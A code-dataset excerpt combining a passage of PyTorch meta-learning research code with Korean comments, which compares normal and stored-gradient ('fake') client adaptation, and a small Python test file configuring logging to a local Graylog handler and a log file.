#############fake adopt 8 (랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 전반 client 가지고 fake 진행행
def fake_adopt_10_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
# 초반 50% client를 가지고 grads 저장 + 정상적인 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_10_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
### 검증용 (FP 9,10과 제대로 된 연산 성능을 비교해서 문제점을 파악)
# 당연히 CLIENT는 32이고 DISJOINT 하지도 않다.
# 다만 첫 16개는 정상진행 # 이후 16개는 사제연산으로 진행하도록 한다.
def fake_adopt_11_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# 후반 50% client fake 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# 정상적인 진행 :전반 50% client
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_11_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
| 3.25 | 3 |
sigda/test/graylog.py | yangluoshen/sigda | 0 | 17699 | <filename>sigda/test/graylog.py
#coding:utf-8
#from graypy import GELFHandler
import logging.config
import logging
'''
handler = GELFHandler(host='0.0.0.0', port=12201)
logger = logging.getLogger()
logger.addHandler(handler)
logger.error('catch error')
'''
LOG_LEVEL = 'DEBUG'
def get_log_config(category):
log_file = "{}.log".format(category)
return {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'default': {
'format': '%(asctime)s %(levelname)s %(message)s'
},
'console': {
'format': "%(asctime)s [%(thread)d] %(levelname)s %(funcName)s\t%(message)s"
},
},
'handlers': {
'graylog2': {
'level': LOG_LEVEL,
'formatter': 'default',
'class': 'graypy.GELFHandler',
'host': '0.0.0.0',
'port': 12201,
'debugging_fields': False,
'facility': category
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
'formatter': 'console',
'filename': log_file
}
},
'root': {
'handlers': ['graylog2', 'file'],
'level': LOG_LEVEL
}
}
LOG_CONFIG = get_log_config('sigda')
logging.config.dictConfig(LOG_CONFIG)
logging.error('catch error again2')
| 2.28125 | 2 |